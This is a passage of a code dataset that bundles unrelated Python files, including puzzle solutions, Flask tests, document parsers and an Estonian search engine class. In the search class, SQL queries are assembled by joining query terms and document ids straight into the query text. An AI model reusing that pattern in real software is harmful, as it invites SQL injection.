\"./output2.txt\"\n\n\ndef count_chars(col: list, highest_occurrence: bool, tie_breaker: str):\n result = {\"0\": 0, \"1\": 0}\n\n for char in col:\n if f\"{char}\" == \"0\":\n result[\"0\"] += 1\n else:\n result[\"1\"] += 1\n\n if result[\"0\"] == result[\"1\"]:\n return tie_breaker\n elif result[\"0\"] > result[\"1\"]:\n return \"0\" if highest_occurrence else \"1\"\n else:\n return \"1\" if highest_occurrence else \"0\"\n\n\ndef reduce_grid(\n grid: list, current_idx: int, highest_occurrence: bool, tie_breaker: str\n):\n working_col = [row[current_idx] for row in grid]\n key = count_chars(working_col, highest_occurrence, tie_breaker)\n\n new_grid = [row for row in grid if row[current_idx] == key]\n\n # print(\n # f\"key: {key}, current_index: {current_idx}, grid_size: {len(new_grid)}, old_grid: {len(grid)}\"\n # )\n # for line in new_grid:\n # print(line)\n\n if len(new_grid) == 1:\n return int(\"\".join(new_grid[0]), 2)\n else:\n return reduce_grid(new_grid, current_idx + 1, highest_occurrence, tie_breaker)\n\n\ndef main():\n with open(input_file, \"r\") as input:\n grid = [list(line.strip()) for line in input]\n\n oxygen = reduce_grid(grid, 0, True, \"1\")\n co2 = reduce_grid(grid, 0, False, \"0\")\n\n print(\"Oxygen:\", oxygen)\n print(\"CO2:\", co2)\n print(\"Life support:\", oxygen * co2)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"morfien101/adventofcode","sub_path":"2021/03/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14769328766","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\ndef path_to_x(head, x):\n if head is None:\n return None\n if head.val == x:\n return str(x)\n path = str(head.val)\n left = path_to_x(head.left, x)\n if left:\n return path + left\n right = path_to_x(head.right, x)\n if right:\n return path + right\n return None\n\ndef lca(head, v1, v2):\n path_to_v1 = path_to_x(head, v1)\n path_to_v2 = path_to_x(head, v2)\n if path_to_v1 is None or path_to_v2 is None:\n return None\n\n common_ancestor = str(head.val)\n i = 0\n while i < len(path_to_v1) and i < len(path_to_v2):\n if path_to_v1[i] == path_to_v2[i]:\n common_ancestor = path_to_v1[i]\n i += 1\n else:\n break\n return common_ancestor\n\n# Set up tree\nhead = Node(5)\nhead.left = Node(1)\nhead.left.left = Node(3)\nhead.left.right = Node(8)\nhead.left.left.left = Node(6)\nhead.left.left.right = Node(7)\nhead.right = Node(4)\nhead.right.left = Node(9)\nhead.right.right = Node(2)\n\nprint(lca(head, 7,1))","repo_name":"nickgreenquist/InterviewPrep","sub_path":"11 Essential Interview Questions/Linked Lists and Trees/lowest_common.py","file_name":"lowest_common.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43137154241","text":"import re\n\nimport tiledbsoma as soma\n\n\ndef _get_experiment(census: soma.Collection, organism: str) -> soma.Experiment:\n \"\"\"Given a census ``soma.Collection``, return the experiment for the named organism.\n Organism matching is somewhat flexible, attempting to map from human-friendly\n names to the underlying collection element name.\n\n Args:\n census: soma.Collection\n The census.\n organism: str\n The organism name, eg., ``Homo sapiens``.\n\n Returns:\n A soma.Experiment object with the requested experiment.\n\n Raises:\n ValueError: if unable to find the specified organism.\n\n Lifecycle:\n maturing\n\n Examples:\n\n >>> human = get_experiment(census, 'homo sapiens')\n\n >>> human = get_experiment(census, 'Homo sapiens')\n\n >>> human = get_experiment(census, 'homo_sapiens')\n \"\"\"\n # lower/snake case the organism name to find the experiment name\n exp_name = re.sub(r\"[ ]+\", \"_\", organism).lower()\n\n if exp_name not in census[\"census_data\"]:\n raise ValueError(f\"Unknown organism {organism} - does not exist\")\n exp = census[\"census_data\"][exp_name]\n if exp.soma_type != \"SOMAExperiment\":\n raise ValueError(f\"Unknown organism {organism} - not a SOMA Experiment\")\n\n return exp\n","repo_name":"chanzuckerberg/cellxgene-census","sub_path":"api/python/cellxgene_census/src/cellxgene_census/_experiment.py","file_name":"_experiment.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"83"} +{"seq_id":"8540636610","text":"#!/usr/bin/env python3\n\nimport os\nimport requests\nimport json\nimport sqlite3\nfrom collections import OrderedDict\nfrom typing import List, Dict, Tuple, Union\nfrom operator import itemgetter\n\nclass SEARCH_DB:\n def __init__(self):\n \"\"\"Muutijate algväärtustamine ja andmebaasi avamine\n\n Raises:\n Exception: Kui andmebaasi avamine ebaõnnestus\n \"\"\"\n self.VERSION=\"2023.10.02\" # otsimootori versioon\n\n self.db_index = os.environ.get('DB_INDEX') # otsime andmebaasi nime keskkonnamootujast\n if self.db_index is None: # kui seal polnud...\n self.db_index = './index.sqlite' # ...võtame vaikimisi\n\n # avame andmebaasi ainult lugemiseks\n\n try:\n self.con_index = sqlite3.connect(f'file:{self.db_index}?mode=rw', \n uri=True, check_same_thread=False)\n except:\n self.con_index = None\n raise Exception({\"error\": \n f'Andmebaasi {self.db_index} avamine ebaõnnestus'})\n \n self.cur_index = self.con_index.cursor()\n\n self.ea_paring = os.environ.get('EA_PARING')\n if self.ea_paring is None:\n self.EA_PARING_IP=os.environ.get('EA_PARING_IP') if os.environ.get('EA_PARING_IP') != None else 'localhost'\n self.EA_PARING_PORT=os.environ.get('EA_PARING_PORT') if os.environ.get('EA_PARING_PORT') != None else '6602'\n self.ea_paring = f'http://{self.EA_PARING_IP}:{self.EA_PARING_PORT}/api/ea_paring/json'\n\n def __del__(self)->None:\n \"\"\"Sulgeme avatud andmebaasid\n \"\"\"\n if self.con_index is not None:\n self.con_index.close()\n\n def otsing(self, fragments:bool, query_str:str, query_json:Dict)->None:\n \"\"\"Public: Otsing: päringus ja indeksis sõnavormid\n\n Args:\n fragments (bool): \n * True: vaatame liitsõna osasõnasid, \n * False: ei vaata liitsõna osasõnasid\n\n query_json (Dict): päring (vastava veebiteenusega lemmade \n kombinatsiooniks teisendatud otsisõned)\n \"\"\"\n self.fragments = fragments # kas otsime liitsõna osasõndest\n self.query_str = query_str # jokksev päringustring\n self.query_json = query_json # jooksev päringujson\n self.result_json = {} # otsingutulemus\n\n if len(self.query_json[\"annotations\"][\"query\"]) > 0:\n self.otsing_rec(0, []) # rekursiivne otsing, tulemus self.result_json\n for docid in self.result_json:\n self.result_json[docid] = sorted(self.result_json[docid].items())\n\n # otsingutulemuste korrastamine\n #for docid in self.result_json: #järjestame otsingutulemused iga dokumendi siseselt\n # self.result_json[docid] = OrderedDict(sorted(self.result_json[docid].items(), key=lambda t: t[0]))\n\n def otsing_rec(self, query_idx:int, required_docids:List[str])->bool:\n \"\"\"Private: Rekursiivne otsingualgoritm\n\n Args:\n query_idx (int): parajasti vaatame niimitmendat \n päringusõne range(0, len(self.query_json[\"annotations\"][\"query\"]))\n\n required_idx_docid (str): otsitav peab olema selles dokumendis, \n None - suvaline dokument sobib\n\n Returns:\n bool: False: ei leidnud midagi sobivat; True: leidsime midagi \n sobivat, vt self.result_json \n \"\"\"\n\n docids_list, res_dct = self.leia_indeksist(query_idx, required_docids)\n if len(docids_list) < 1:\n return False # mitte ükski dokument ei sobinud\n \n if query_idx+1 >= len(self.query_json[\"annotations\"][\"query\"]):\n self.result_json = res_dct # Lisame viimase märksõnaga seotud info\n return True # Otsing andis tulemusi\n \n if self.otsing_rec(query_idx+1, docids_list) is False:\n return False\n \n for docid in res_dct:\n if docid in self.result_json:\n self.result_json[docid].update(res_dct[docid])\n\n return True # anname teada, kas leidsime midagi sobivat\n\n def leia_indeksist(self, query_idx:int, required_docids:List[str])->Tuple[List[str], Dict]:\n where_tingimus = 'lemma in (\"' + '\",\"'.join(self.query_json[\"annotations\"][\"query\"][query_idx]) + '\")'\n if self.fragments is False:\n where_tingimus += f' AND \"liitsona_osa\" = 0'\n if len(required_docids) > 0:\n where_tingimus += ' AND docid in (\"' + '\",\"'.join(required_docids) + '\")'\n\n res_exec = self.cur_index.execute(f'''\n SELECT\n indeks.docid,\n indeks.start,\n indeks.end, \n lemma_korpuse_vormid.vorm,\n lemma_korpuse_vormid.lemma,\n indeks.liitsona_osa\n FROM lemma_korpuse_vormid\n INNER JOIN indeks ON lemma_korpuse_vormid.vorm = indeks.vorm\n WHERE {where_tingimus}''')\n res_list = res_exec.fetchall()\n # 0 1 2 3 4 5 \n # res_list[(docid, start, end, vorm, lemma, liitsona_osa)]\n # res_dct = { DOCID: { START: { \"end\":int, \"features\":[{\"vorm\":str, \"lemma\":str, liitsona_osa:int }]}}\n res_dct = {}\n docids_list = []\n for list_item in res_list:\n if list_item[0] not in docids_list:\n docids_list.append(list_item[0])\n if list_item[0] not in res_dct: # docid\n res_dct[list_item[0]] = {}\n if list_item[1] not in res_dct[list_item[0]]: # start\n res_dct[list_item[0]][list_item[1]] = {\"end\":list_item[2], \"features\":[]}\n item = (list_item[3], list_item[4],list_item[5])\n if item not in res_dct[list_item[0]][list_item[1]][\"features\"]:\n res_dct[list_item[0]][list_item[1]][\"features\"].append(item)\n return docids_list, res_dct \n\n\n\n def koosta_vastus(self, formaat:str, norm_paring:bool)->None:\n \"\"\"Public: Otsingutulemus moel või teisel HTML-kujule\n\n Args:\n formaat (str): päringu tulemuse esitusviis {html|html+details|json}\n\n Returns:\n str: Soovitud kujul otsingutulemus\n \"\"\"\n self.content = '

Päring:

'\n if norm_paring is True:\n self.content += json.dumps(self.query_json, ensure_ascii=False, indent=2).replace(' ', ' ').replace('\\n', '
')+'
'\n else:\n self.content += f'{self.query_str}

'\n if formaat == 'json':\n self.koosta_vastus_json()\n else:\n self.koosta_vastus_html(formaat)\n\n def koosta_vastus_json(self)->None:\n \"\"\"Private: Esita otsingu JSON-tulemus HTML-kujul\n\n Returns:\n (str) self.content: otsingu JSON-tulemus HTML-kujul\n \"\"\"\n self.content += \"

Tulemus:

\"\n self.content += json.dumps(self.result_json, ensure_ascii=False, indent=2).replace(' ', ' ').replace('\\n', '
')+'
'\n\n def koosta_vastus_html(self, formaat:str)->None:\n \"\"\"Private: Esita otsingu JSON-tulemus märgendatud tekstina HTML-kujul\n\n Args:\n formaat (str): päringu tulemuse esitusviis {\"html\"|\"html+details\"|\"json\"}\n \n\n Returns:\n _type_: otsingu JSON-tulemus märgendatud tekstina HTML-kujul\n \"\"\" \n if len(self.result_json) <= 0:\n self.content += 'Päringule vastavaid dokumente ei leidunud!'\n else:\n # res_dct = { DOCID: { START: { \"end\":int, \"features\":[{\"vorm\":str, \"lemma\":str, liitsona_osa:int }]}}\n for docid in self.result_json:\n # võtame andmebaasist teksti\n source_content = self.cur_index.execute(\n f'''SELECT content FROM allikad\n WHERE docid = \"{docid}\"''').fetchall()[0][0]\n self.content += f'

DocID: {docid}

'\n prev_end = 0\n for inf in self.result_json[docid]: # (START, { \"end\":int, [{\"vorm\":str, \"lemma\":str, liitsona_osa:int }] })\n self.content += source_content[prev_end:inf[0]] # eelmise lõpust jooksva alguseni\n self.content += f' {source_content[inf[0]:inf[1][\"end\"]]}'\n #if formaat == 'text_details':\n # self.content += f'[{\", \".join(link[\"tokens\"])}]'\n prev_end = inf[1][\"end\"]\n self.content += f'{source_content[prev_end:]}
'\n self.content = self.content.replace('\\n', '
')\n\n ","repo_name":"estnltk/smart-search","sub_path":"wp/ea_paring_otsing/api_ea_paring_otsing.py","file_name":"api_ea_paring_otsing.py","file_ext":"py","file_size_in_byte":8783,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21978593319","text":"import pytest\nfrom todor.db import get_db\n\n\ndef test_index(client, auth):\n response = client.get('/')\n assert \"Zaloguj się\" in response.get_data(as_text=True)\n assert \"Utwórz konto\" in response.get_data(as_text=True)\n\n auth.login()\n response = client.get('/')\n assert 'Wyloguj się' in response.get_data(as_text=True)\n assert b'adres1@wp.pl' in response.data\n assert b'2018-01-01' in response.data\n assert b'test\\nbody' in response.data\n assert b'href=\"/1/edytuj\"' in response.data\n\n\n@pytest.mark.parametrize('path', (\n '/dodaj',\n '/1/edytuj',\n '/1/usun',\n))\ndef test_login_required(client, path):\n response = client.post(path)\n assert response.headers[\"Location\"] == \"/auth/login\"\n\n\ndef test_author_required(app, client, auth):\n # change the post author to another user\n with app.app_context():\n db = get_db()\n db.execute('UPDATE zadania SET id_user = 2 WHERE id = 1')\n db.commit()\n\n auth.login()\n # current user can't modify other user's post\n assert client.post('/1/edytuj').status_code == 403\n assert client.post('/1/usun').status_code == 403\n # current user doesn't see edit link\n assert b'href=\"/1/edytuj\"' not in client.get('/').data\n\n\n@pytest.mark.parametrize('path', (\n '/2/edytuj',\n '/2/usun',\n))\ndef test_exists_required(client, auth, path):\n auth.login()\n assert client.post(path).status_code == 404\n\n\ndef test_create(client, auth, app):\n auth.login()\n assert client.get('/dodaj').status_code == 200\n client.post('/dodaj', data={'zadanie': 'nowe'})\n\n with app.app_context():\n db = get_db()\n count = db.execute('SELECT COUNT(id) FROM zadania').fetchone()[0]\n assert count == 2\n\n\ndef test_update(client, auth, app):\n auth.login()\n assert client.get('/1/edytuj').status_code == 200\n client.post('/1/edytuj', data={'zadanie': 'poprawione'})\n\n with app.app_context():\n db = get_db()\n post = db.execute('SELECT * FROM zadania WHERE id = 1').fetchone()\n assert post['zadanie'] == 'poprawione'\n\n\n@pytest.mark.parametrize('path', (\n '/dodaj',\n '/1/edytuj',\n))\ndef test_create_update_validate(client, auth, path):\n auth.login()\n response = client.post(path, data={'zadanie': '', 'id': 1})\n assert 'Zadanie nie może być puste.' in response.get_data(as_text=True)\n\n\ndef test_delete(client, auth, app):\n auth.login()\n response = client.post('/1/usun')\n assert response.headers[\"Location\"] == \"/\"\n\n with app.app_context():\n db = get_db()\n zadanie = db.execute('SELECT * FROM zadania WHERE id = 1').fetchone()\n assert zadanie is None\n","repo_name":"lo1cgsan/todoSQL","sub_path":"tests/test_zadania.py","file_name":"test_zadania.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37317715765","text":"import sys\nnum = int(input())\nnum_list = list(map(int,sys.stdin.readline().split()))\nres = 0\nsum = sum(num_list)\nfor i in num_list:\n sum -= i\n res += (i * sum)\nres = res % 1000000007\nprint(res)","repo_name":"MilkyWay-U/Baekjoon","sub_path":"Python/23827.py","file_name":"23827.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34940022230","text":"# _*_coding:utf-8_*_\n# Author : Leo\n# Time : 17/12/2018\nimport requests\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36\"}\nparam={\"wd\":\"python\"}\nurl_temp=\"https://www.baidu.com/s\"\n\nresponse=requests.get(url_temp,headers=headers,params=param)\nprint(response.status_code)\nprint(response.request.url)","repo_name":"UltramanShuai/request_basic","sub_path":"first_try/try_params.py","file_name":"try_params.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"2528510741","text":"import pathlib\nimport xml.etree.ElementTree as ElementTree\nfrom pprint import pprint\nfrom typing import Dict\n\n\ndef parse_keymap(keymap) -> Dict[str, Dict[str, str]]:\n \"\"\"\n Функция парсит keymap-файл(файл с настройками комбинаций)\n и возвращает словарь вида:\n {команда1: { клавиша1: код_модификатор,\n клавиша2: код_модификатор,...\n клавиша3: код_модификатор},...}\n\n @param keymap: example (r'D:/BFR.xml')\n @return: dict { '$Redo': {\n 'back_space': 'as',\n 'z': 'cs'\n },\n 'Back': {\n 'button4': 'push',\n 'left': 'ac'\n },\n \"\"\"\n if keymap is str:\n tree = ElementTree.parse(pathlib.Path(keymap))\n else:\n tree = ElementTree.parse(keymap)\n ###############\n # example tree\n # \n # \n # \n ################\n\n root = tree.getroot()\n actions = {}\n for action in root:\n action_name = action.attrib['id']\n shortcuts = {}\n for combo in action:\n # не учитывать комбинации вида\n # \n if len(combo.attrib.keys()) == 1:\n for subkey in combo.attrib.keys():\n # \"shift ctrl Z\"\n mod_keys_with_key = combo.attrib.get(subkey).lower()\n *mod_keys, k_key = mod_keys_with_key.split()\n if len(mod_keys) != 0:\n mod_abbr = \"\".join(\n [mod_key[0] for mod_key in sorted(mod_keys)])\n # [shift, ctrl] => 'cs'\n else:\n mod_abbr = \"push\"\n shortcuts.update({k_key: mod_abbr})\n actions[action_name] = shortcuts\n return actions\n\n\nif __name__ == \"__main__\":\n # print(get_commands_with_modifiers())\n # pprint(parse_settings_file(r'D:/Windows.xml'))\n\n pprint(parse_keymap(r\"D:Empty.xml\"))\n","repo_name":"katafoxi/keybinds-map","sub_path":"kmap/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"20536793748","text":"import pandas as pd\nimport os, csv\n\nCSV_PATH = r'C:\\Users\\surface\\Desktop\\YouWe\\OCR\\Utilities\\output\\Training Data\\Reformated csv'\nCSV_files = os.listdir(CSV_PATH)\nOCR_PATH = r'C:\\Users\\surface\\Desktop\\YouWe\\OCR\\Utilities\\output\\Training Data\\Reformated ocr'\nOCR_files = os.listdir(OCR_PATH)\nOUT_PATH = r'C:\\Users\\surface\\Desktop\\YouWe\\OCR\\Utilities\\output\\Training Data'\n\nc = 0\nk = 1\nfor i in range(len(OCR_files)):\n ocr_file = OCR_files[i]\n csv_file = CSV_files[k]\n if ocr_file == csv_file:\n c+=1\n print('match!', c)\n k+=1\n os.chdir(OCR_PATH)\n df_ocr = pd.read_csv(ocr_file, header=None, encoding='ISO-8859-1', sep='/t')\n os.chdir(CSV_PATH)\n df_csv = pd.read_csv(csv_file, header=0, encoding='ISO-8859-1', sep=',')\n df_join = df_ocr.join(df_csv)\n os.chdir(OUT_PATH)\n df_join.to_csv('{}.csv'.format(os.path.splitext(ocr_file)[0]), index=False, encoding='ISO-8859-1')\n elif ocr_file != csv_file:\n print(csv_file, ocr_file)\n k+=2\nprint(c)\n","repo_name":"JonasRosenzweig/OCR-","sub_path":"Utilities/training_data.py","file_name":"training_data.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"86642312875","text":"\"\"\"Record parsing.\"\"\"\n\n\nimport re\nfrom functools import cached_property\nfrom datetime import datetime\nimport xml.etree.ElementTree as ET\nimport pytz\nfrom bs4 import BeautifulSoup\nfrom .exceptions import (\n NotLoggedInError,\n UnrecognisedDCCRecordError,\n UnauthorisedError,\n)\n\n\nclass DCCParser:\n \"\"\"A parser for DCC documents.\n\n Parameters\n ----------\n content : str\n The response body.\n \"\"\"\n\n def __init__(self, content):\n self.content = content\n\n def html_navigator(self):\n \"\"\"An HTML navigator for the document content.\n\n Returns\n -------\n :class:`bs4.BeautifulSoup`\n The HTML navigator.\n \"\"\"\n return BeautifulSoup(self.content, \"html.parser\")\n\n def dcc_numbers(self):\n \"\"\"Potential DCC numbers contained within the text of the document.\n\n Returns\n -------\n :class:`set`\n Potential DCC numbers.\n \"\"\"\n from .records import DCCNumber\n\n available_letters = \"\".join(DCCNumber.document_type_letters)\n dcc_number_pattern = re.compile(\n fr\"(LIGO-)?([{available_letters}]\\d{{5,}}(-(x0|v\\d+))?)\"\n )\n\n found = set()\n\n # Search for DCC numbers in the text.\n # Use the HTML navigator so BeautifulSoup deals with the encoding, even though\n # we don't necessary insist the input is HTML.\n navigator = self.html_navigator()\n for match in dcc_number_pattern.findall(str(navigator)):\n if match:\n found.add(match[1])\n\n return found\n\n\nclass DCCXMLRecordParser(DCCParser):\n \"\"\"A parser for DCC XML record documents.\"\"\"\n\n def __init__(self, content):\n super().__init__(content)\n self.docrev = None\n self._parse()\n\n def _parse(self):\n # Strip out anything not supposed to be here, that would otherwise cause parser\n # errors.\n content = self.content.replace(\"\\u000b\", \"\") # Line feed character (L1200193)\n\n try:\n self.root = ET.fromstring(content)\n except ET.ParseError:\n # This is not an XML document. Do we have an error page instead? Use the\n # HTML parser to find out.\n navigator = self.html_navigator()\n\n # Check if we have the login page, specified by the presence of an h3 with\n # specific text.\n if navigator.find(\"h3\", text=\"Accessing private documents\"):\n raise NotLoggedInError()\n\n # Check if we have the default page (DCC redirects here for all unrecognised\n # requests).\n if navigator.find(\"strong\", text=\"Search for Documents by\"):\n raise UnrecognisedDCCRecordError()\n\n # Check if we have the error page.\n if navigator.find(\"dt\", class_=\"Error\"):\n # We have an error, but what is its message?\n if navigator.find(\n \"dd\",\n text=re.compile(\n \"User .*? is not authorized to view this document.\"\n ),\n ):\n # Unauthorised.\n raise UnauthorisedError()\n\n raise\n\n if not self.root.attrib[\"project\"] == \"LIGO\":\n # Invalid DCC document.\n raise UnrecognisedDCCRecordError()\n\n self.docrev = self.root[0][0]\n\n @cached_property\n def dcc_number_pieces(self):\n t = self.docrev.find(\"dccnumber\").text[0]\n n = self.docrev.find(\"dccnumber\").text[1:]\n v = self.docrev.attrib[\"version\"]\n return t, n, v\n\n @cached_property\n def docid(self):\n return self.docrev.attrib[\"docid\"]\n\n @cached_property\n def title(self):\n return self.docrev.find(\"title\").text\n\n @cached_property\n def authors(self):\n for a in self.docrev.findall(\"author\"):\n name = a.find(\"fullname\").text\n\n try:\n enum = a.find(\"employeenumber\").text\n except AttributeError:\n enum = None\n\n yield name, enum, a.get(\"id\")\n\n @cached_property\n def abstract(self):\n return self.docrev.find(\"abstract\").text\n\n @cached_property\n def keywords(self):\n return [k.text for k in self.docrev.findall(\"keyword\")]\n\n @cached_property\n def note(self):\n return self.docrev.find(\"note\").text\n\n @cached_property\n def publication_info(self):\n return self.docrev.find(\"publicationinfo\").text\n\n @cached_property\n def journal_reference(self):\n ref = self.docrev.find(\"reference\")\n\n if not ref:\n return\n\n journal = ref.find(\"journal\").text\n volume = ref.find(\"volume\").text\n page = ref.find(\"page\").text\n citation = ref.find(\"citation\").text\n url = ref.attrib.get(\"href\")\n\n return journal, volume, page, citation, url\n\n @cached_property\n def other_version_numbers(self):\n return set(\n [int(r.attrib[\"version\"]) for r in self.docrev.find(\"otherversions\")]\n )\n\n @cached_property\n def revision_dates(self):\n # DCC dates use the Pacific timezone\n pacific = pytz.timezone(\"US/Pacific\")\n\n # parse modified date string localised to Pacific Time\n modified = pacific.localize(\n datetime.strptime(self.docrev.attrib[\"modified\"], \"%Y-%m-%d %H:%M:%S\")\n )\n\n # other dates aren't in XML yet\n return None, modified, None\n\n @cached_property\n def attached_files(self):\n for file_ in self.docrev.findall(\"file\"):\n name = file_.find(\"name\").text\n\n try:\n title = file_.find(\"description\").text\n except AttributeError:\n title = name\n\n url = file_.attrib[\"href\"]\n yield title, name, url\n\n @cached_property\n def related_ids(self):\n return self._extract_refs(\"xrefto\")\n\n @cached_property\n def referencing_ids(self):\n return self._extract_refs(\"xrefby\")\n\n def _extract_refs(self, field):\n for field in self.docrev.findall(field):\n # Extract the DCC number.\n # Note some xref elements don't have an alias, e.g. M950046; these are\n # ignored.\n alias = field.attrib.get(\"alias\")\n if alias:\n yield alias\n\n\nclass DCCXMLUpdateParser(DCCParser):\n \"\"\"A parser for DCC XMLUpdate responses.\"\"\"\n\n def _parse(self):\n # Get an HTML navigator object for the record.\n navigator = self.html_navigator()\n\n # Accept if the page reports a successful modification.\n if navigator.find(string=re.compile(\".*You were successful.*\")):\n return\n\n # Check if we have the login page, specified by the presence of an h3 with\n # specific text.\n if navigator.find(\"h3\", text=\"Accessing private documents\"):\n raise NotLoggedInError()\n\n # Check if we have the default page (DCC redirects here for all unrecognised\n # requests).\n if navigator.find(\"strong\", text=\"Search for Documents by\"):\n raise UnrecognisedDCCRecordError()\n\n # Check if we have the error page.\n if navigator.find(\"dt\", class_=\"Error\"):\n # We have an error, but what is its message?\n if navigator.find(\"dd\", text=re.compile(\".* is invalid.*\")):\n # Record number not valid.\n raise ValueError(\"record number not valid\")\n if navigator.find(\"dd\", text=re.compile(\".* is not modifiable by user.*\")):\n # Unauthorised to update.\n raise UnauthorisedError()\n\n raise Exception(\"Invalid XML update document\")\n","repo_name":"SeanDS/dcc","sub_path":"src/dcc/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":7705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"42445950752","text":"import logging\nimport re\nfrom urllib.parse import urlparse\nimport requests\n\nfrom grimoirelab_toolkit.datetime import str_to_datetime\n\nfrom .enrich import Enrich, metadata\nfrom ..elastic_mapping import Mapping as BaseMapping\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Mapping(BaseMapping):\n\n @staticmethod\n def get_elastic_mappings(es_major):\n \"\"\"Get Elasticsearch mapping.\n\n :param es_major: major version of Elasticsearch, as string\n :returns: dictionary with a key, 'items', with the mapping\n \"\"\"\n\n mapping = \"\"\"\n {\n \"properties\": {\n \"text_analyzed\": {\n \"type\": \"text\",\n \"fielddata\": true,\n \"index\": true\n }\n }\n } \"\"\"\n\n return {\"items\": mapping}\n\n\nclass GitterEnrich(Enrich):\n\n mapping = Mapping\n\n # REGEX to extract links from HTML text\n HTML_LINK_REGEX = re.compile(\"href=[\\\"\\'](.*?)[\\\"\\']\")\n\n def __init__(self, db_sortinghat=None, db_projects_map=None, json_projects_map=None,\n db_user='', db_password='', db_host=''):\n super().__init__(db_sortinghat, db_projects_map, json_projects_map,\n db_user, db_password, db_host)\n\n def get_field_author(self):\n return \"fromUser\"\n\n def get_sh_identity(self, item, identity_field=None):\n # email not available for gitter\n identity = {\n 'username': None,\n 'name': None,\n 'email': None\n }\n\n if self.get_field_author() not in item['data']:\n return identity\n from_ = item['data'][self.get_field_author()]\n\n identity['username'] = from_.get('username', None)\n identity['name'] = from_.get('displayName', None)\n\n return identity\n\n def get_identities(self, item):\n \"\"\" Return the identities from an item \"\"\"\n\n identity = self.get_sh_identity(item)\n yield identity\n\n def get_project_repository(self, eitem):\n tokens = eitem['origin'].rsplit(\"/\", 1)\n return tokens[0] + \" \" + tokens[1]\n\n @metadata\n def get_rich_item(self, item):\n\n eitem = {}\n\n self.copy_raw_fields(self.RAW_FIELDS_COPY, item, eitem)\n\n message = item['data']\n\n eitem['unread'] = 1 if message['unread'] else 0\n eitem['text_analyzed'] = message['text']\n\n copy_fields = [\"readBy\", \"issues\", \"id\"]\n\n for f in copy_fields:\n if f in message:\n eitem[f] = message[f]\n else:\n eitem[f] = None\n\n eitem.update(self.get_rich_links(item['data'], item['uuid'], item['origin']))\n\n message_timestamp = str_to_datetime(eitem['metadata__updated_on'])\n eitem['tz'] = int(message_timestamp.strftime(\"%H\"))\n\n if self.sortinghat:\n eitem.update(self.get_item_sh(item))\n\n if self.prjs_map:\n eitem.update(self.get_item_project(eitem))\n\n eitem.update(self.get_grimoire_fields(item[\"metadata__updated_on\"], \"message\"))\n\n self.add_repository_labels(eitem)\n self.add_metadata_filter_raw(eitem)\n return eitem\n\n def get_rich_links(self, item, uuid, origin):\n\n rich_item = {}\n\n if item['issues']:\n self.extract_issues(item['issues'], item['html'], uuid, origin)\n\n if item['mentions']:\n rich_item['mentioned'] = self.extract_mentions(item['mentions'])\n\n rich_item['url_hostname'] = []\n\n if item['urls']:\n for url in item['urls']:\n try:\n url_parsed = urlparse(url['url'])\n rich_item['url_hostname'].append('{uri.scheme}://{uri.netloc}/'.format(uri=url_parsed))\n except ValueError: # url could not be properly parsed\n logger.error(\"[gitter] UUID {} - Could not parse URL '{}'\".format(uuid, url))\n continue\n\n return rich_item\n\n def extract_issues(self, issue_pr, html_text, uuid, origin):\n \"\"\"Enrich issues or PRs mentioned in the message\"\"\"\n\n project_repo = '/'.join(origin.split(\"/\")[-2:]).lower()\n\n links_found = self.HTML_LINK_REGEX.findall(html_text)\n for i, entity in enumerate(issue_pr):\n # Determine the kind of repo that the message refers to\n if 'repo' in entity.keys():\n r = entity['repo'].lower()\n if r == project_repo:\n repo_type = 'project'\n elif r.split('/')[0] == project_repo.split('/')[0]:\n repo_type = 'parent'\n else:\n repo_type = 'foreign'\n\n entity['repo_type'] = repo_type\n\n # First check to see if issue could be determined via parsed html link\n if 'repo' in entity.keys() and 'number' in entity.keys() and links_found:\n try:\n if links_found[i].split('/')[-2] == 'issues':\n entity['is_issue'] = entity['repo'] + ' #' + entity['number']\n elif links_found[i].split('/')[-2] == 'pull':\n entity['is_pull'] = entity['repo'] + ' #' + entity['number']\n else:\n continue\n entity['url'] = links_found[i]\n entity['repo_type'] = repo_type\n continue\n except IndexError:\n pass\n \n # If issue is referred to in a span tag, then we will need to connect to github\n # to determine if the issue is a pull request or issue\n if 'repo' in entity.keys() and 'number' in entity.keys():\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n url = 'https://github.com/' + entity['repo'] + '/issues/' + entity['number']\n response = requests.get(url, headers=headers)\n\n # Check to see if it is a redirect, then it is probably a pull request\n if response.history:\n entity['is_pull'] = entity['repo'] + ' #' + entity['number']\n entity['url'] = 'https://github.com/' + entity['repo'] + '/pull/' + entity['number']\n entity['repo_type'] = repo_type\n elif response.status_code == 200:\n entity['is_issue'] = entity['repo'] + ' #' + entity['number']\n entity['url'] = url\n entity['repo_type'] = repo_type\n \n continue\n\n logger.error(\"[gitter] UUID {} - Could not 